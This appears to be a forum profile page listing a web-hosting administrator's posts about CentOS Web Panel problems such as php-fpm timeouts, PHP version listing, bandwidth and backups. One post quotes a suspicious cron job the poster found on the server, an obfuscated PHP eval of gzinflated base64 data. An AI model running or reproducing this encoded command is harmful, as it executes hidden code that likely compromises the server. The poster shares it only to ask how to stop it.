Jump to content
View in the app

A better way to browse. Learn more.

AlphaGNU

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

leisegang

Priority Members
  • Joined

  • Last visited

  1. [Wed May 21 00:34:42.824943 2025] [proxy_fcgi:error] [pid 296120:tid 296160] (70007)The timeout specified has expired: [client xxx:43672] AH01075: Error dispatching request to : (polling) Connection refused: AH02454: FCGI: attempt to connect to Unix domain socket /opt/alt/php-fpm82/usr/var/sockets/domain.sock (localhost:8000) failed AH01079: failed to make connection to backend: localhost I Get this error EVERY night at around 00-02 the only way to get the page up again is by restarting the php-fpm service. All other sites on the server are online only 1 page goes down. i cant figure out what causes this. Any ideas?
  2. @Sandeep B. Is there a guide for installing Imunify AV on CWP. Could you have a go at it and try to make a guide for standalone installation, OR even better making a in panel integration?
  3. Some users are creating cron jobs under their usename. How can i make shure that this stops? looks like this: /usr/bin/php -r 'eval(gzinflate(base64_decode("jVJrb5swFP2eX8GkSCRqNUHbpIqmaWvTkidLQxriME0RGFMMxjAwUJj632fIsw9p8wd8jc85995z3YjcqB9SRzcJtk2GWuL6MZRmlEUz7+YalqGs3oV4euFm1mqZGUFPWgdKYg06BAbzDA51bA2IBy5cyVrlmX15w8xVx7OGum8AlXN0ab3o5ObwBs8u/K76yMqZ51/N8PjMAIZrKQyBvgst8lyARQQn9VmzJyT3gcxup3pko9LoreQOXMnSb6AwC5Ccgv6YYxgcyzkGS3epK7eOdqdK6nKsaMruv861FJnjnu2KP9E5v08s4DF74rEzWIyuzcewmF2qXbUcdUf+LbF5b5O+5iwlfaH7+mJV2CNd0eZAmpc/7pS+tpxTsPCvR17lj1r5U6pliB3SgbCIApv3bg9IxvspJ5d6bgwUydB7zACaW8Vr0GGc2xPbXxpOSiHDIRXeTqCZoLgt/Gk0BL4ITpjQajopIQ8mc8+FZlIkDAX3NOMxDG3Et8hkDMW0LXwVUsrZmEuVqGWZCepebWxUwbayPG+l2kzCNIaI4x1M0OYJsQ0MKUOUJcdcOyx2hFYUo6dNYDLotl7l38q0q2qF3YoRS2O6pb4cBD6dKuzKPfB5UN+g5B9K29oxhWEcI8g09ISeeQ8JizcxiogJ+fNFovBZEDOz3oh4Lojfv5lxXB/NQjw1cG8GRfli70dd517sTSquJR6b/oB8Wsi+pZ/Sr92geAUPw4fN/WzKo9fXB5Gd6vHzzrxT+4+0//GtGnXAcLAfex2fjFs4E2RpS0spwdR/9xTqxxKlHz2WD5pgYVoVfII4ZOWIl8Zf")));'
  4. ip route default via 46.xx.xx.1 dev enp4s0 proto static metric 100 46.xx.xx.0/26 dev enp4s0 proto kernel scope link src 46.xx.xx.16 metric 100 46.xx.xx.44 is my main ip. Also both uses the same interface when running vnstat ns1.domain.com -> 46.xx.xx.44 ns2.domain.com -> 46.xx.xx.16 In february i used 11gb bandwith on the secondary. So far in march i have used 97gb
  5. I have the share ip at lets say 10.0.0.1 and a secondary ip 10.0.03. Server ip is 10.0.0.2 Shared ip is also 10.0.0.1 All sites use server ip Why do i have over 1GB transfer every hour on the secondary ip?
  6. Has anyone tried aapanel? https://www.aapanel.com/
  7. i get this error: make: *** [Makefile:314: sapi/cli/php] Error 1 shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory /usr/local/cwpsrv/htdocs/resources/conf/el8/php-fpm_selector/external_modules/8.3/sodium.sh: line 9: /opt/alt/php-fpm83/usr/bin/phpize: No such file or directory /usr/local/cwpsrv/htdocs/resources/conf/el8/php-fpm_selector/external_modules/8.3/sodium.sh: line 10: ./configure: No such file or directory make: *** No targets specified and no makefile found. Stop. make: *** No rule to make target 'install'. Stop. /usr/local/cwpsrv/htdocs/resources/conf/el8/php-fpm_selector/external_modules/8.3/sodium.sh: line 14: /opt/alt/php-fpm83/usr/bin/php-config: No such file or directory ERROR: Missing extension file /sodium.so exe:/opt/alt/php-fpm83/usr/sbin/php-fpm Build Completed ################### Error:Can't add notification!
  8. i just made a module and ran this in the module file: <?php if ( !isset( $include_path ) ) { echo "invalid access"; exit( ); } $phpversion1 = shell_exec("grep php-fpm74 /usr/local/apache/conf.d/vhosts/*"); echo "<h2>PHP Version 7.4</h2><pre>".$phpversion1."</pre>"; echo "<br><br>"; $phpversion2 = shell_exec("grep php-fpm82 /usr/local/apache/conf.d/vhosts/*"); echo "<h2>PHP Version 8.2</h2><pre>".$phpversion2."</pre>"; echo "<br><br>"; $phpversion3 = shell_exec("grep php-fpm83 /usr/local/apache/conf.d/vhosts/*"); echo "<h2>PHP Version 7.3</h2><pre>".$phpversion3."</pre>"; echo "<br><br>"; $phpversion4 = shell_exec("grep php-fpm84 /usr/local/apache/conf.d/vhosts/*"); echo "<h2>PHP Version 8.4</h2><pre>".$phpversion4."</pre>"; echo "<br><br>"; ?>
  9. i Use the php-fpm selector. Is there a way to list all sites and what PHP version they are using? I have PHP 7, 8.1, 8.2 and 8.3 and want to move all to 8.3 but it takes a lot of time opening all controlpanels and checking. How can i list all sites or versions?
  10. Can i add an account domain1.com and then point domain2.com to the same folder.? So if i have a php file it says welcome to domain1 if i open it on domain1.com and it says domain2 if i open domain2.com?
  11. Goaccess isnt producing montly stats for me,. also never has. on any site Is there a way of getting awstats or webaliser or analog stats to work with CWP on the customers panel and on admin if possible. customers are most important
  12. Is there a way to get it to backup it to a TAR without it beeing compressed? I have several large mail accounts that use like 2 hours to backup. OR is there a way to do a sort of manual script for backup that is possible to then again import if i need to recover an account? One of my accounts started backup at: 2024-12-29 01:59:06 and finished at 2024-12-29 05:30:39 its like 15gb account, and of those there are like 13GB emails. IF i could just make my backups faster and have the possibility to import it again i would like that.
  13. i would sayt that the server lacks a recursive DNS record. Does it have a public IP and a PTR`?
  14. Why is this disk usage so insanely large? Its OK that it uses 40gb on email, but the webpage isnt that big. 1 gb, my total would say that he uses around 42gb disk. How can this be explained?

Configure browser push notifications

Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.